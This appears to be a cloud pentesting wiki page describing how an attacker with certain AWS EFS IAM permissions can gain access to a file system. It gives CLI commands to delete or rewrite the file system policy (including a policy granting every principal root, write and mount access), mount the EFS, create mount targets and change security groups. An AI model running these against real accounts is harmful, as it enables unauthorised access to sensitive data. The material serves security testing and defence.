AWS - EFS Privesc

Reading time: 3 minutes

EFS

More info about EFS in:

AWS - EFS Enum

Remember that in order to mount an EFS you need to be in a subnetwork where the EFS is exposed and have access to it (security groups). Is this is happening, by default, you will always be able to mount it, however, if it's protected by IAM policies you need to have the extra permissions mentioned here to access it.

elasticfilesystem:DeleteFileSystemPolicy|elasticfilesystem:PutFileSystemPolicy

With any of those permissions an attacker can change the file system policy to give you access to it, or to just delete it so the default access is granted.

To delete the policy:

aws efs delete-file-system-policy \
    --file-system-id <value>

To change it:

aws efs put-file-system-policy --file-system-id <fs-id> --policy file:///tmp/policy.json

// Give everyone trying to mount it read, write and root access
// policy.json:
{
    "Version": "2012-10-17",
    "Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763",
    "Statement": [
        {
            "Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": [
	       "elasticfilesystem:ClientRootAccess",
               "elasticfilesystem:ClientWrite",
               "elasticfilesystem:ClientMount"
            ],
            "Condition": {
                "Bool": {
                    "elasticfilesystem:AccessedViaMountTarget": "true"
                }
            }
        }
    ]
}

elasticfilesystem:ClientMount|(elasticfilesystem:ClientRootAccess)|(elasticfilesystem:ClientWrite)

With this permission an attacker will be able to mount the EFS. If the write permission is not given by default to everyone that can mount the EFS, he will have only read access.

sudo mkdir /efs
sudo mount -t efs -o tls,iam  <file-system-id/EFS DNS name>:/ /efs/

The extra permissionselasticfilesystem:ClientRootAccess and elasticfilesystem:ClientWrite can be used to write inside the filesystem after it's mounted and to access that file system as root.

Potential Impact: Indirect privesc by locating sensitive information in the file system.

elasticfilesystem:CreateMountTarget

If you an attacker is inside a subnetwork where no mount target of the EFS exists. He could just create one in his subnet with this privilege:

# You need to indicate security groups that will grant the user access to port 2049
aws efs create-mount-target --file-system-id <fs-id> \
    --subnet-id <value> \
    --security-groups <value>

Potential Impact: Indirect privesc by locating sensitive information in the file system.

elasticfilesystem:ModifyMountTargetSecurityGroups

In a scenario where an attacker finds that the EFS has mount target in his subnetwork but no security group is allowing the traffic, he could just change that modifying the selected security groups:

aws efs modify-mount-target-security-groups \
    --mount-target-id <value> \
    --security-groups <value>

Potential Impact: Indirect privesc by locating sensitive information in the file system.